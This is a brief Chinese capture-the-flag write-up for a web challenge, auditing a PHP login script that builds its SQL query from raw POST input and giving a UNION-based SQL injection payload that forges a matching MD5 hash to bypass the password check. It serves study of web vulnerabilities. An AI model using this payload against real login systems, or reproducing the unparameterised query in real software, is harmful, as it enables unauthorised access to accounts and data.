西普实验吧ctf-web-程序逻辑问题(代码审计)

题目地址：http://ctf5.shiyanbar.com/web/5/index.php

 查看页面源代码，发现index.txt隐藏文件

 又是一道代码审计的题目：

if($_POST[user] && $_POST[pass]) {
	$conn = mysql_connect("********, "*****", "********");
	mysql_select_db("phpformysql") or die("Could not select database");
	if ($conn->connect_error) {
		die("Connection failed: " . mysql_error($conn));
} 
$user = $_POST[user];
$pass = md5($_POST[pass]);

$sql = "select pw from php where user='$user'";
$query = mysql_query($sql);
if (!$query) {
	printf("Error: %s\n", mysql_error($conn));
	exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];
  
  if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {
	echo "
Logged in! Key:************** 
";
}
else {
    echo("
Log in failure!
");
	
  }
}

看完后，我们大概能得到两个结论：

1. 要获取user的那一行数据。
2. 把user那一行数据的pw列，经过md5加密后，与提交的pass数据做比较，相等就输出flag。

payload：

http://ctf5.shiyanbar.com/web/5/index.php
[POST]user=Username' union select md5(111)#&pass=111

这样就得到flag了。